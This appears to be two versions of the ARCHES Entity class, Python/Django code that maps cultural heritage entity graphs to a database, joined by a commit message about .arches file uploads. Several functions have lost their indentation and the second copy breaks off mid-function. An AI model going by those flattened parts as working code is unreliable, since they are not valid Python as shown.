    self.businesstablename = entity.entitytypeid.businesstablename if entity.entitytypeid.businesstablename else ''
    # get the entity value if any
    if entity.entitytypeid.businesstablename != None:
        themodel = self._get_model(entity.entitytypeid.businesstablename)
        themodelinstance = themodel.objects.get(pk = pk)
        columnname = entity.entitytypeid.getcolumnname()
        if (isinstance(themodelinstance, archesmodels.Domains)):
            # domain values store a concept label id plus its readable label
            self.value = themodelinstance.getlabelid()
            self.label = themodelinstance.getlabelvalue()
        elif (isinstance(themodelinstance, archesmodels.Files)):
            # files expose their name as the label and their URL as the value
            self.label = themodelinstance.getname()
            self.value = themodelinstance.geturl()
        else:
            # plain business data: read the column; the fallback string
            # surfaces a missing row instead of raising AttributeError
            self.value = getattr(themodelinstance, columnname, 'Entity %s could not be found in the table %s' % (pk, entity.entitytypeid.businesstablename))
            self.label = self.value
    # get the property that associated parent to child
    if parent is not None:
        relation = archesmodels.Relations.objects.get(entityiddomain = parent.entityid, entityidrange = entity.entityid)
        self.property = relation.ruleid.propertyid_id
    # get the child entities if any (recursing one Relations row at a time)
    child_entities = archesmodels.Relations.objects.filter(entityiddomain = pk)
    for child_entity in child_entities:
        self.append_child(Entity().get(child_entity.entityidrange_id, entity))
    return self
def _save(self):
    """
    Saves an entity back to the db, returns a DB model instance, not an instance of self.

    Generates a fresh UUID when self.entityid is not already a valid
    UUID, writes the business-table value (Domains/Files get special
    label/value handling), then recursively saves children and their
    Relations rows.
    """
    entitytype = archesmodels.EntityTypes.objects.get(pk = self.entitytypeid)
    try:
        uuid.UUID(self.entityid)
    except(ValueError):
        # not a valid UUID yet: this is a new entity, mint an id
        self.entityid = str(uuid.uuid4())
    entity = archesmodels.Entities()
    entity.entitytypeid = entitytype
    entity.entityid = self.entityid
    entity.save()
    columnname = entity.entitytypeid.getcolumnname()
    if columnname != None:
        themodel = self._get_model(entity.entitytypeid.businesstablename)
        themodelinstance = themodel()
        themodelinstance.entityid = entity
        self.businesstablename = entity.entitytypeid.businesstablename
        # if we need to populate the E32 nodes then this is the code to do it,
        # but it really slows down the save so i'm leaving it commented for now
        # if (isinstance(themodelinstance, archesmodels.Domains)):
        #     setattr(themodelinstance, columnname, self.value)
        #     themodelinstance.save()
        #     concept = Concept(themodelinstance.val.conceptid).get_context()
        #     if concept:
        #         if len(self.child_entities) == 0:
        #             rule = archesmodels.Rules.objects.filter(entitytypedomain_id=self.entitytypeid)
        #             if len(rule) == 1:
        #                 self.add_child_entity(rule[0].entitytyperange_id, rule[0].propertyid_id, concept.id, '')
        #         elif len(self.child_entities) == 1:
        #             self.child_entities[0].value = concept.id
        if not (isinstance(themodelinstance, archesmodels.Files)):
            setattr(themodelinstance, columnname, self.value)
            themodelinstance.save()
            self.label = self.value
            if (isinstance(themodelinstance, archesmodels.Domains)):
                # domains echo back the stored label id / label text
                self.value = themodelinstance.getlabelid()
                self.label = themodelinstance.getlabelvalue()
        else:
            # Saving of files must be handled specially
            # Because on subsequent saves of a file resource, we post back the file path url (instead of posting the file like we originally did),
            # we want to prevent the path from being saved back to the database thus screwing up the file save process
            if isinstance(self.value, (InMemoryUploadedFile, TemporaryUploadedFile)):
                setattr(themodelinstance, columnname, self.value)
                themodelinstance.save()
                self.value = themodelinstance.geturl()
                self.label = themodelinstance.getname()
    for child_entity in self.child_entities:
        child = child_entity._save()
        rule = archesmodels.Rules.objects.get(entitytypedomain = entity.entitytypeid, entitytyperange = child.entitytypeid, propertyid = child_entity.property)
        archesmodels.Relations.objects.get_or_create(entityiddomain = entity, entityidrange = child, ruleid = rule)
    return entity
def _delete(self, delete_root=False):
    """
    Deletes this entity and all its children.

    Also attempts to delete the highest parent (and any nodes on the way)
    of this node when this node is the only child and the parent has no
    value.

    delete_root -- when False (the default) the graph's root Entities row
                   is left in the database
    """
    nodes_to_delete = []
    # gather together a list of all entities that includes self and all its children
    def gather_entities(entity):
        nodes_to_delete.append(entity)
    self.traverse(gather_entities)
    # delete the gathered entities
    for entity in nodes_to_delete:
        self_is_root = entity.get_rank() == 0
        if self_is_root and delete_root:
            dbentity = archesmodels.Entities.objects.get(pk = entity.entityid)
            dbentity.delete()
        else:
            parent = entity.get_parent()
            parent_is_root = parent.get_rank() == 0
            # filter() (not get()) tolerates rows already deleted by an
            # earlier iteration
            dbentity = archesmodels.Entities.objects.filter(pk = entity.entityid)
            if len(dbentity) == 1:
                dbentity[0].delete()
            parent.child_entities.remove(entity)
            # now try and remove this entity's parent when it carries no
            # information of its own (childless, valueless, not the root)
            if len(parent.child_entities) == 0 and parent.value == '' and not parent_is_root:
                parent._delete()
def load(self, E):
"""
Populate an Entity instance from a generic python object
"""
self.property = E.get('property', '')
self.entitytypeid = E.get('entitytypeid', '')
self.entityid = E.get('entityid', '')
self.value = E.get('value', '')
self.label = E.get('label', '')
self.businesstablename = E.get('businesstablename', '')
for entity in E.get('child_entities', []):
child_entity = Entity()
self.append_child(child_entity.load(entity))
return self
def add_child_entity(self, entitytypeid, property, value, entityid):
    """Create a child Entity with the given data, attach it, and return it."""
    child = Entity()
    child.entitytypeid = entitytypeid
    child.property = property
    child.value = value
    child.entityid = entityid
    self.append_child(child)
    return child
def append_child(self, entity):
    """
    Append a child entity to this entity instance.

    Also attaches a get_parent() bound method to the child so the graph
    can be walked upward (see get_rank / get_root / _delete).
    """
    parent = self
    def func(self):
        # closure over the parent; "self" here is the child entity
        return parent
    # NOTE(review): the 3-argument form of types.MethodType is
    # Python 2 only; under Python 3 this raises TypeError.
    entity.get_parent = types.MethodType(func, entity, Entity)
    self.child_entities.append(entity)
def merge(self, entitytomerge):
    """
    Merge an entity graph into this instance at the lowest common node.

    When the two roots are mergeable (see can_merge), blank ids/values on
    self are filled from entitytomerge and children are either merged
    recursively or appended; otherwise the whole incoming graph is
    appended to this node's parent.
    """
    if self.can_merge(entitytomerge):
        # update self.entityid if it makes sense to do so
        if self.entityid == '' and entitytomerge.entityid != '':
            self.entityid = entitytomerge.entityid
        # update self.value if it makes sense to do so
        if self.value == '' and entitytomerge.value != '':
            self.value = entitytomerge.value
        entities_to_merge = []
        entities_to_append = []
        # gather lists of entities that can be merged and ones that will be appended
        for child_entitytomerge in entitytomerge.child_entities:
            entities_to_append.append(child_entitytomerge)
            for child_entity in self.child_entities:
                if child_entity.can_merge(child_entitytomerge):
                    # pop() removes the child we just appended (it is the
                    # last element), reclassifying it as mergeable
                    entities_to_merge.append(entities_to_append.pop())
                    break
        for entity in entities_to_append:
            self.append_child(entity)
        for child_entity in self.child_entities:
            for entity_to_merge in entities_to_merge:
                if child_entity.can_merge(entity_to_merge):
                    child_entity.merge(entity_to_merge)
                    break
    else:
        # roots are incompatible: hang the incoming graph off our parent
        self.get_parent().append_child(entitytomerge)
def can_merge(self, entitytomerge):
"""
A test to see whether 2 nodes can merge or not
"""
# if the nodes are equal attempt a merge otherwise don't bother
if (self.entitytypeid == entitytomerge.entitytypeid and self.property == entitytomerge.property):
# if the value of each node is not blank and they are not equal, then the nodes can't be merged
if self.value != '' and entitytomerge.value != '' and self.value != entitytomerge.value:
return False
return True
else:
return False
def merge_at(self, entitytomerge, entitytypeid):
    """
    Merge an entity graph into this instance at the node type specified.
    If the node can't be found in self then merge the entity graph at Root.

    Only merges when exactly one node of the given type exists on each
    side; returns self in all cases.
    """
    selfEntities = self.find_entities_by_type_id(entitytypeid)
    foundEntities = entitytomerge.find_entities_by_type_id(entitytypeid)
    if len(selfEntities) == 1 and len(foundEntities) == 1:
        for foundEntity in foundEntities[0].child_entities:
            selfEntities[0].append_child(foundEntity)
    # if you can't find the merge node in self then just merge at Root
    # (recursion terminates because the root always matches its own type)
    if len(selfEntities) == 0 and len(foundEntities) == 1:
        self.merge_at(entitytomerge, self.entitytypeid)
    return self
def diff(self, entitytotest):
    """
    Find all the entities in self that don't exist in entitytotest
    (this represents entities that have effectively been deleted from entitytotest
    when entitytotest is a version of self).

    Returns a dict with 'deleted_nodes', 'updated_nodes' and
    'inserted_nodes' lists; a node appearing on both sides with the same
    entityid but a different hash is reclassified as updated.
    """
    ret = {'deleted_nodes':[], 'updated_nodes':[], 'inserted_nodes': []}
    # flatten() returns copies, so set arithmetic on entity hashes is safe
    self_flattened = set(self.flatten())
    entitytotest_flattened = set(entitytotest.flatten())
    ret['deleted_nodes'] = list(entitytotest_flattened.difference(self_flattened))
    ret['inserted_nodes'] = list(self_flattened.difference(entitytotest_flattened))
    # nodes present on both sides by id but differing by hash were updated,
    # not inserted+deleted; move them to updated_nodes
    for inserted_entity in list(self_flattened.difference(entitytotest_flattened)):
        for deleted_entity in list(entitytotest_flattened.difference(self_flattened)):
            if inserted_entity.entityid == deleted_entity.entityid:
                ret['inserted_nodes'].remove(inserted_entity)
                ret['deleted_nodes'].remove(deleted_entity)
                ret['updated_nodes'].append({'from': deleted_entity, 'to': inserted_entity})
    return ret
def copy(self):
return copy.deepcopy(self)
def flatten(self):
    """
    Flattens the graph into a list of unordered entities.

    Works on a deep copy, so the original graph is untouched; each
    returned entity gets a parentid attribute (None for the root) and
    an emptied child_entities list.
    """
    ret = []
    def gather_entities(entity):
        if entity.get_rank() != 0:
            entity.parentid = entity.get_parent().entityid
        else:
            entity.parentid = None
        ret.append(entity)
    # copy first so clearing child_entities below can't mutate self
    copiedself = self.copy()
    copiedself.traverse(gather_entities)
    for item in ret:
        item.child_entities = []
    return ret
def find_entities_by_type_id(self, entitytypeid):
"""
Gets a list of entities within this instance of a given type
"""
ret = []
def appendValue(entity):
if entity.entitytypeid == entitytypeid:
ret.append(entity)
self.traverse(appendValue)
return ret
def traverse(self, func, scope=None):
    """
    Traverses a graph from leaf to root calling the given function on each node;
    passes an optional scope to each function.
    Return a value from the function to prematurely end the traversal.
    """
    for child_entity in self.child_entities:
        ret = child_entity.traverse(func, scope)
        if ret != None:
            # a child's callback returned a value: stop the whole walk
            return ret
    if scope == None:
        ret = func(self)
    else:
        ret = func(self, scope)
    # break out of the traversal if the function returns a value
    if ret != None:
        return ret
def get_rank(self, rank=0):
"""
Get the rank of this instance (root is 0)
"""
if hasattr(self, 'get_parent'):
return self.get_parent().get_rank(rank+1)
return rank
def get_root(self):
"""
Get the root node of this instance
"""
if hasattr(self, 'get_parent'):
return self.get_parent().get_root()
return self
def set_entity_value(self, entitytypeid, value, append=False):
    """
    Directly sets the value of a node in the graph.

    Will only set the value if the node exists and there is only one
    instance of that node, or if the node doesn't exist it will be
    created from the mapping schema.  If append is True, a new node is
    always created next to any existing nodes of the same type.

    Returns the affected Entity, or None when multiple matching nodes
    exist and append is False (ambiguous target).
    """
    entities = self.find_entities_by_type_id(entitytypeid)
    if append or len(entities) == 0:
        # build the missing branch from the ontology mapping and merge it in
        schema = Entity.get_mapping_schema(self.entitytypeid)
        entity = Entity()
        entity.create_from_mapping(self.entitytypeid, schema[entitytypeid]['steps'], entitytypeid, value)
        self.merge_at(entity, schema[entitytypeid]['mergenodeid'])
        return entity
    if len(entities) == 1:
        entities[0].value = value
        return entities[0]
def create_from_mapping(self, entitytypeid, mappingsteps, leafentitytypeid, leafvalue, leafentityid=''):
    """Build a chain of child entities along mappingsteps, placing
    leafvalue on the step whose range matches leafentitytypeid.
    Returns self (the root of the new chain)."""
    self.entitytypeid = entitytypeid
    node = self
    for step in mappingsteps:
        node.entityid = ''
        step_value = leafvalue if step['entitytyperange'] == leafentitytypeid else ''
        node = node.add_child_entity(step['entitytyperange'],
                                     step['propertyid'],
                                     step_value,
                                     leafentityid)
    return self
@classmethod
def get_mapping_schema(cls, entitytypeid):
    """
    Gets a complete entity schema graph for a single entity type given an entity type id.

    Returns a dict keyed by target entity type id, each value holding the
    ordered mapping 'steps' and the 'mergenodeid' to merge new branches at.
    """
    ret = {}
    mappings = archesmodels.Mappings.objects.filter(entitytypeidfrom = entitytypeid)
    for mapping in mappings:
        if mapping.entitytypeidto.pk not in ret:
            ret[mapping.entitytypeidto.pk] = {'steps':[], 'mergenodeid': mapping.mergenodeid}
        # later mappings to the same target overwrite earlier steps
        ret[mapping.entitytypeidto.pk]['steps'] = (Entity._get_mappings(mapping.pk))
    return ret
@classmethod
def _get_mappings(cls, mappingid):
    """
    Gets a single mapping (its ordered rule steps) given a mapping id.

    Returns a list of dicts with 'entitytypedomain', 'entitytyperange'
    and 'propertyid' keys, ordered by mapping step order.
    """
    ret = []
    cursor = connection.cursor()
    # SECURITY FIX: pass mappingid as a bound query parameter instead of
    # interpolating it into the SQL string with %-formatting.
    cursor.execute("""
        SELECT
            rules.entitytypedomain,
            rules.entitytyperange,
            rules.propertyid,
            mapping_steps."order",
            mappings.entitytypeidfrom,
            mappings.entitytypeidto,
            mapping_steps.mappingid
        FROM
            ontology.rules,
            ontology.mapping_steps,
            ontology.mappings
        WHERE
            mapping_steps.ruleid = rules.ruleid AND
            mappings.mappingid = %s AND
            mappings.mappingid = mapping_steps.mappingid
        ORDER BY
            mappings.entitytypeidfrom ASC,
            mappings.entitytypeidto ASC,
            mappings.mappingid ASC,
            mapping_steps."order" ASC;
    """, [mappingid])
    mapping_steps = cursor.fetchall()
    for mapping_step in mapping_steps:
        rule = {}
        rule['entitytypedomain'] = mapping_step[0]
        rule['entitytyperange'] = mapping_step[1]
        rule['propertyid'] = mapping_step[2]
        ret.append(rule)
    return ret
def prune(self, entitytypes, action='disallow'):
"""
entitytypes is a list of entitytypeids allowed or dissallowed in the graph
if action=disallow (the default) then prune will remove all entities and their children from the entity graph that match the list of provided entitytypes
if action=allow then prune will pass through all entities and their parents from the entity graph that match the list of provided entitytypes
.. code-block:: python
# simple example of prunning a graph
entity.prune(['ARCHES RECORD.E31', 'PHASE TYPE ASSIGNMENT.E17', 'SPATIAL COORDINATES_GEOMETRY.E47', 'NAME.E41'])
# a more fully formed example of prunning a graph based on user permissions
fullgraph = set(entity.flatten())
from django.contrib.auth.models import User
user = User.objects.get(pk=1)
print user
if not user.is_superuser:
permissions = user.get_all_permissions()
entitytypes = []
for permission in permissions:
if permission.startswith('%s.read_' % entity.entitytypeid):
print permission.split('%s.read_' % entity.entitytypeid)[1]
entitytypes.append(permission.split('%s.read_' % entity.entitytypeid)[1])
entity.prune(entitytypes, action='allow')
prunedgraph = set(entity.flatten())
print fullgraph.intersection(prunedgraph)
print fullgraph.issuperset(prunedgraph)
print fullgraph.symmetric_difference(prunedgraph)
"""
if action == 'disallow':
self.filter(lambda entity: entity.entitytypeid not in entitytypes)
else:
self.filter(lambda entity: entity.entitytypeid in entitytypes)
return
# parent_entitytypes = set()
# flattened_graph = self.flatten()
# entities_to_prune = set()
# def gather_parent_entitytypes(entity):
# if entity.get_rank() == 0:
# return
# parent_entity = entity.get_parent()
# parent_entitytypes.add(parent_entity.entitytypeid)
# gather_parent_entitytypes(parent_entity)
# if action == 'disallow':
# for entity in flattened_graph:
# if entity.entitytypeid in entitytypes:
# entities_to_prune.add(entity)
# else:
# # if you passed in no entitytypes then you're basically saying remove all information from the graph
# if len(entitytypes) == 0:
# self.clear()
# return
# # first we need to loop through the graph to all the parents of entity to the list of allowed entitytypes
# for entity in flattened_graph:
# if entity.entitytypeid in entitytypes:
# gather_parent_entitytypes(entity)
# entitytypes = entitytypes + list(parent_entitytypes)
# for entity in flattened_graph:
# if entity.entitytypeid not in entitytypes:
# entities_to_prune.add(entity)
# # prune the remaining entities
# print 'entities to prune: %s' % entities_to_prune
# for entity in entities_to_prune:
# try:
# parent = entity.get_parent()
# print '\nremoving: %s' % entity
# parent.child_entities.remove(entity)
# except:
# if entity.get_rank() == 0:
# self.clear()
# return
self.trim()
def trim(self):
"""
recursively removes all nodes starting from the leaf that have no child_entities and no value
these nodes are assumed to be of no material value to the graph
"""
#somelist[:] = [tup for tup in somelist if determine(tup)]
# def func(entity):
# try:
# parent = entity.get_parent()
# print '-'*10
# print entity
# print len(parent.child_entities)
# if len(entity.child_entities) == 0 and entity.value == '':
# print JSONSerializer().serialize(entity, indent=4)
# parent.child_entities.remove(entity)
# print len(parent.child_entities)
# except:
# pass
# def func(entity):
# try:
# # http://stackoverflow.com/questions/1207406/remove-items-from-a-list-while-iterating-in-python
# parent = entity.get_parent()
# parent.child_entities[:] = [child_entity for child_entity in parent.child_entities if (len(child_entity.child_entities) != 0 or child_entity.value != '')]
# except:
# pass
#self.traverse(func)
self.filter((lambda entity: len(entity.child_entities) != 0 or entity.value != ''))
def filter(self, lambda_expression):
"""
Only allows the nodes defined in the lambda_expression to populate the entity graph
(eg: filters out of the entity graph any entity that doesn't return true from the lambda_expression)
"""
def func(entity):
if hasattr(entity, 'get_parent'):
parent = entity.get_parent()
parent.child_entities[:] = filter(lambda_expression, parent.child_entities)
# else:
# entity.child_entities[:] = filter(lambda_expression, entity.child_entities)
self.traverse(func)
def clear(self):
"""
resets this entity back to a clean state (does not delete the entity from the database)
"""
self.child_entities = []
self.entitytypeid = ''
self.entityid = ''
self.value = ''
@staticmethod
def _get_model(tablename):
    """
    Helper to look up a model from a table name.

    tablename -- business table name; resolved as Django model 'models.<tablename>'
    Raises TypeError when no matching model is found.
    """
    try:
        model_identifier = str('models.' + tablename)
        Model = models.get_model(*model_identifier.split("."))
    except TypeError:
        Model = None
    if Model is None:
        # NOTE(review): if the str() concatenation itself raised TypeError,
        # model_identifier is unbound here and this raise becomes a NameError
        raise TypeError(u"Invalid model identifier: '%s'" % model_identifier)
    return Model
def dictify(self, keys=None):
    """
    Turn the entity graph into nested dicts/lists keyed by undotified
    entitytypeids (e.g. "NAME.E41" -> "NAME_E41").

    Children with a businesstablename (value-bearing nodes) are flattened via
    get_nodes(); grouping children recurse into dictify(), each occurrence
    appended to a list, e.g.::

        {"NAME_E41": [{"NAME_TYPE_E55__label": "Primary",
                       "NAME_E41__label": "3264 N WRIGHTWOOD DR"}]}

    keys -- attribute names to pass through to encode(); defaults to ['label'].
            (Default changed from a shared mutable list to None for safety;
            behavior is unchanged.)
    """
    if keys is None:
        keys = ['label']
    data = {}
    for child_entity in self.child_entities:
        # hoist the repeated undotify() call
        key = child_entity.undotify()
        if child_entity.businesstablename != '':
            data[key] = self.get_nodes(child_entity.entitytypeid, keys=keys)
        else:
            data.setdefault(key, []).append(child_entity.dictify(keys=keys))
    return data
def get_nodes(self, entitytypeid, keys=None):
    """
    Used by dictify to gather and flatten each node of the given type
    (and all its children) into a single dict, e.g.::

        [{"NAME_TYPE_E55__label": "Primary", "NAME_E41__label": "..."}]

    keys -- attribute names passed through to encode(); defaults to [].
    Fixes: ``dict(a.items() + b.items())`` is Python-2-only (dict views don't
    support ``+`` on Python 3) -- use dict.update(); also avoids shadowing the
    outer loop variable.
    """
    if keys is None:
        keys = []
    ret = []
    for found in self.find_entities_by_type_id(entitytypeid):
        data = {}
        for node in found.flatten():
            data.update(node.encode(keys=keys))
        ret.append(data)
    return ret
def encode(self, keys=[]):
    """
    Encode this Entity into a dict whose keys are the undotified
    entitytypeid concatenated with the attribute name, e.g.::

        {"NAME_TYPE_E55__label": "Primary"}

    Only attributes listed in ``keys`` are included.
    """
    prefix = self.undotify()
    return dict(('%s__%s' % (prefix, key), value)
                for key, value in self.__dict__.items() if key in keys)
def undotify(self):
    """Return this entity's type id in a form usable as a dict/JSON key."""
    return self.undotify_entitytypeid()
def undotify_entitytypeid(self):
    """
    Replace '.' with '_' and '-' with '___' so the entitytypeid can be used
    as an identifier-style key.  (Stray trailing semicolon removed.)
    """
    return self.entitytypeid.replace('.', '_').replace('-', '___')
def to_json(self):
    """Serialize the full entity graph to a JSON string."""
    return JSONSerializer().serialize(self)
Fix file upload during the save of a .arches file.
'''
ARCHES - a program developed to inventory and manage immovable cultural heritage.
Copyright (C) 2013 J. Paul Getty Trust and World Monuments Fund
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU Affero General Public License as
published by the Free Software Foundation, either version 3 of the
License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Affero General Public License for more details.
You should have received a copy of the GNU Affero General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import uuid
import types
import copy
import arches.app.models.models as archesmodels
from django.contrib.gis.db import models
from django.contrib.gis.geos import fromstr
from django.contrib.gis.geos import GEOSGeometry
from django.db import connection
from django.db import transaction
from django.core.files.uploadedfile import InMemoryUploadedFile, TemporaryUploadedFile
from arches.app.models.concept import Concept
from arches.app.utils.betterJSONSerializer import JSONSerializer, JSONDeserializer
class Entity(object):
"""
Used for mapping complete entity graph objects to and from the database
"""
def __init__(self, *args, **kwargs):
    """
    Build an empty entity, or populate it from a single positional argument:
    - a string that parses as a UUID: load the graph from the database (get)
    - any other string: treated as JSON and deserialized (load)
    - any other non-None object: handed to load()
    """
    self.property = ''
    self.entitytypeid = ''
    self.entityid = ''
    self.value = ''
    self.label = ''
    self.businesstablename = ''
    self.child_entities = [
        # contains an array of other entities
    ]
    if len(args) != 0:
        if isinstance(args[0], basestring):
            try:
                uuid.UUID(args[0])
                self.get(args[0])
            except(ValueError):
                self.load(JSONDeserializer().deserialize(args[0]))
        elif isinstance(args[0], Entity):
            # NOTE(review): rebinding the local name ``self`` has no effect --
            # an Entity argument is silently ignored rather than copied; confirm intent
            self = args[0]
        elif args[0] != None and isinstance(args[0], object):
            self.load(args[0])
def __repr__(self):
    """Debug representation: class, id, type and JSON-serialized value."""
    serialized_value = JSONSerializer().serialize(self.value)
    return ('%s: %s of type %s with value %s') % (self.__class__, self.entityid, self.entitytypeid, serialized_value)
def __hash__(self):
    """Hash on (entitytypeid, entityid, value, property); geometries hash via WKT."""
    hashable_value = self.value.wkt if isinstance(self.value, GEOSGeometry) else self.value
    return hash((self.entitytypeid, self.entityid, hashable_value, self.property))
def __eq__(self, x):
    """Entities compare equal when their hashes match (see __hash__)."""
    return hash(x) == hash(self)
def __ne__(self, x):
    """Inverse of __eq__ (explicit on Python 2, which does not derive it)."""
    return hash(x) != hash(self)
def get(self, pk, parent=None):
    """
    Gets a complete entity graph for a single entity instance given an entity id
    If a parent is given, will attempt to lookup the rule used to relate parent to child

    pk -- primary key (entityid) of the root entity to load
    parent -- optional parent Entity used to resolve the connecting property
    Returns self, populated recursively with all child entities.
    """
    entity = archesmodels.Entities.objects.get(pk = pk)
    self.entitytypeid = entity.entitytypeid_id
    self.entityid = entity.pk
    self.businesstablename = entity.entitytypeid.businesstablename if entity.entitytypeid.businesstablename else ''
    # get the entity value if any
    if entity.entitytypeid.businesstablename != None:
        themodel = self._get_model(entity.entitytypeid.businesstablename)
        themodelinstance = themodel.objects.get(pk = pk)
        columnname = entity.entitytypeid.getcolumnname()
        # Domains and Files expose label/value through model helpers;
        # everything else reads the business-table column directly
        if (isinstance(themodelinstance, archesmodels.Domains)):
            self.value = themodelinstance.getlabelid()
            self.label = themodelinstance.getlabelvalue()
        elif (isinstance(themodelinstance, archesmodels.Files)):
            self.label = themodelinstance.getname()
            self.value = themodelinstance.geturl()
        else:
            self.value = getattr(themodelinstance, columnname, 'Entity %s could not be found in the table %s' % (pk, entity.entitytypeid.businesstablename))
            self.label = self.value
    # get the property that associated parent to child
    if parent is not None:
        relation = archesmodels.Relations.objects.get(entityiddomain = parent.entityid, entityidrange = entity.entityid)
        self.property = relation.ruleid.propertyid_id
    # get the child entities if any
    child_entities = archesmodels.Relations.objects.filter(entityiddomain = pk)
    for child_entity in child_entities:
        self.append_child(Entity().get(child_entity.entityidrange_id, entity))
    return self
def _save(self):
    """
    Saves an entity back to the db, returns a DB model instance, not an instance of self

    Creates a new entityid (uuid4) when self.entityid is not a valid UUID,
    writes the business-table value where one exists, then recursively saves
    all children and their Relations rows.
    """
    is_new_entity = False
    entitytype = archesmodels.EntityTypes.objects.get(pk = self.entitytypeid)
    try:
        uuid.UUID(self.entityid)
    except(ValueError):
        # no valid id yet -> this is an insert, mint a fresh uuid
        is_new_entity = True
        self.entityid = str(uuid.uuid4())
    entity = archesmodels.Entities()
    entity.entitytypeid = entitytype
    entity.entityid = self.entityid
    entity.save()
    columnname = entity.entitytypeid.getcolumnname()
    if columnname != None:
        themodel = self._get_model(entity.entitytypeid.businesstablename)
        themodelinstance = themodel()
        themodelinstance.entityid = entity
        self.businesstablename = entity.entitytypeid.businesstablename
        # if we need to populate the E32 nodes then this is the code to do it,
        # but it really slows down the save so i'm leaving it commented for now
        # if (isinstance(themodelinstance, archesmodels.Domains)):
        #     setattr(themodelinstance, columnname, self.value)
        #     themodelinstance.save()
        #     concept = Concept(themodelinstance.val.conceptid).get_context()
        #     if concept:
        #         if len(self.child_entities) == 0:
        #             rule = archesmodels.Rules.objects.filter(entitytypedomain_id=self.entitytypeid)
        #             if len(rule) == 1:
        #                 self.add_child_entity(rule[0].entitytyperange_id, rule[0].propertyid_id, concept.id, '')
        #         elif len(self.child_entities) == 1:
        #             self.child_entities[0].value = concept.id
        if not (isinstance(themodelinstance, archesmodels.Files)):
            setattr(themodelinstance, columnname, self.value)
            themodelinstance.save()
            self.label = self.value
            if (isinstance(themodelinstance, archesmodels.Domains)):
                self.value = themodelinstance.getlabelid()
                self.label = themodelinstance.getlabelvalue()
        else:
            # Saving of files must be handled specially
            # Because on subsequent saves of a file resource, we post back the file path url (instead of posting the file like we originally did),
            # we want to prevent the path from being saved back to the database thus screwing up the file save process
            # This block should only be entered when initally uploading a file via the application, or when inserting records via a .arches file
            if isinstance(self.value, (InMemoryUploadedFile, TemporaryUploadedFile)) or is_new_entity:
                setattr(themodelinstance, columnname, self.value)
                themodelinstance.save()
                self.value = themodelinstance.geturl()
                self.label = themodelinstance.getname()
    # save children and the rule-governed relation rows linking them to us
    for child_entity in self.child_entities:
        child = child_entity._save()
        rule = archesmodels.Rules.objects.get(entitytypedomain = entity.entitytypeid, entitytyperange = child.entitytypeid, propertyid = child_entity.property)
        archesmodels.Relations.objects.get_or_create(entityiddomain = entity, entityidrange = child, ruleid = rule)
    return entity
def _delete(self, delete_root=False):
    """
    Deletes this entity and all it's children.
    Also attempts to delete the highest parent (and any nodes on the way) of this node when I'm the only child and
    my parent has no value.
    if delete_root is False prevent the root node from deleted

    delete_root -- when True the rank-0 node is deleted from the database too
    """
    nodes_to_delete = []
    # gather together a list of all entities that includes self and all its children
    def gather_entities(entity):
        nodes_to_delete.append(entity)
    self.traverse(gather_entities)
    # delete the remaining entities
    for entity in nodes_to_delete:
        self_is_root = entity.get_rank() == 0
        if self_is_root and delete_root:
            dbentity = archesmodels.Entities.objects.get(pk = entity.entityid)
            #print 'deleting root: %s' % dbentity
            dbentity.delete()
        else:
            parent = entity.get_parent()
            parent_is_root = parent.get_rank() == 0
            # print 'deleting: %s' % JSONSerializer().serializeToPython(entity, ensure_ascii=True, indent=4)
            dbentity = archesmodels.Entities.objects.filter(pk = entity.entityid)
            if len(dbentity) == 1:
                dbentity[0].delete()
                parent.child_entities.remove(entity)
                # print 'deleted: %s' % dbentity[0]
                # print 'parent: %s' % JSONSerializer().serializeToPython(parent, ensure_ascii=True, indent=4)
                # now try and remove this entity's parent
                if len(parent.child_entities) == 0 and parent.value == '' and not parent_is_root:
                    #print 'trying to delete parent node'
                    parent._delete()
def load(self, E):
"""
Populate an Entity instance from a generic python object
"""
self.property = E.get('property', '')
self.entitytypeid = E.get('entitytypeid', '')
self.entityid = E.get('entityid', '')
self.value = E.get('value', '')
self.label = E.get('label', '')
self.businesstablename = E.get('businesstablename', '')
for entity in E.get('child_entities', []):
child_entity = Entity()
self.append_child(child_entity.load(entity))
return self
def add_child_entity(self, entitytypeid, property, value, entityid):
    """
    Create a new child Entity with the given attributes, attach it to this
    instance (via append_child) and return the new node.
    """
    child = Entity()
    child.entitytypeid = entitytypeid
    child.property = property
    child.value = value
    child.entityid = entityid
    self.append_child(child)
    return child
def append_child(self, entity):
"""
Append a child entity to this entity instance
"""
parent = self
def func(self):
return parent
entity.get_parent = types.MethodType(func, entity, Entity)
self.child_entities.append(entity)
def merge(self, entitytomerge):
    """
    Merge an entity graph into this instance at the lowest common node

    If the two roots cannot merge (see can_merge), the incoming graph is
    appended to this node's parent instead.
    """
    if self.can_merge(entitytomerge):
        # update self.entityid if it makes sense to do so
        if self.entityid == '' and entitytomerge.entityid != '':
            self.entityid = entitytomerge.entityid
        # update self.value if it makes sense to do so
        if self.value == '' and entitytomerge.value != '':
            self.value = entitytomerge.value
        entities_to_merge = []
        entities_to_append = []
        # gather lists of entities that can be merged and ones that will be appended
        for child_entitytomerge in entitytomerge.child_entities:
            entities_to_append.append(child_entitytomerge)
            for child_entity in self.child_entities:
                if child_entity.can_merge(child_entitytomerge):
                    # mergeable: move it from the append list to the merge list
                    entities_to_merge.append(entities_to_append.pop())
                    break
        for entity in entities_to_append:
            self.append_child(entity)
        for child_entity in self.child_entities:
            for entity_to_merge in entities_to_merge:
                if child_entity.can_merge(entity_to_merge):
                    child_entity.merge(entity_to_merge)
                    break
    else:
        self.get_parent().append_child(entitytomerge)
def can_merge(self, entitytomerge):
"""
A test to see whether 2 nodes can merge or not
"""
# if the nodes are equal attempt a merge otherwise don't bother
if (self.entitytypeid == entitytomerge.entitytypeid and self.property == entitytomerge.property):
# if the value of each node is not blank and they are not equal, then the nodes can't be merged
if self.value != '' and entitytomerge.value != '' and self.value != entitytomerge.value:
return False
return True
else:
return False
def merge_at(self, entitytomerge, entitytypeid):
    """
    Merge an entity graph into this instance at the node type specified
    If the node can't be found in self then merge the entity graph at Root

    Only merges when exactly one node of the type exists on each side.
    Returns self.
    """
    selfEntities = self.find_entities_by_type_id(entitytypeid)
    foundEntities = entitytomerge.find_entities_by_type_id(entitytypeid)
    if len(selfEntities) == 1 and len(foundEntities) == 1:
        for foundEntity in foundEntities[0].child_entities:
            selfEntities[0].append_child(foundEntity)
    # if you can't find the merge node in self then just merge at Root
